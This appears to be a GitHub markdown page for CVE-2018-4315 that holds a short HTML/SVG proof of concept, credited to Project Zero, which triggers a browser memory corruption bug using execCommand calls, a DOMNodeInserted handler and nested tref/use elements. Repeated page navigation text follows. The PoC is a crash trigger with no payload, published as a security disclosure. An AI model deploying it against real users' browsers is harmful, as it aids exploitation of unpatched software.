CVE-2018-4315

PoC

<script>
function freememory() {
 for(var i=0;i<100;i++) {
   a = new Uint8Array(1024*1024);
 }
}
function eventhandler2() {
  svgvar00004.setAttribute("y", "0 1 100");
  document.execCommand("justifyCenter", false);
  svgvar00008.setAttribute("visibility", "hidden");
  freememory()
  document.createElement("q");
  svgvar00007.replaceWith(svgvar00008);
}
function eventhandler4() {
  svgvar00020.addEventListener("DOMNodeInserted", eventhandler2);
  document.execCommand("hiliteColor", false, "red");
}
</script>
<svg id="svgvar00001">
<switch id="svgvar00004">
<tref id="svgvar00007" xlink:href="#svgvar00008" />
<tref id="svgvar00008">
<tspan id="svgvar00020" />
<use id="svgvar00029" xlink:href="#svgvar00001" onload="eventhandler4()" />

Reference

Project Zero

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2018-4315.md

CVE-2018-4315.md

CVE-2018-4315

PoC

Reference

Files

CVE-2018-4315.md

Latest commit

History

CVE-2018-4315.md

File metadata and controls

CVE-2018-4315

PoC

Reference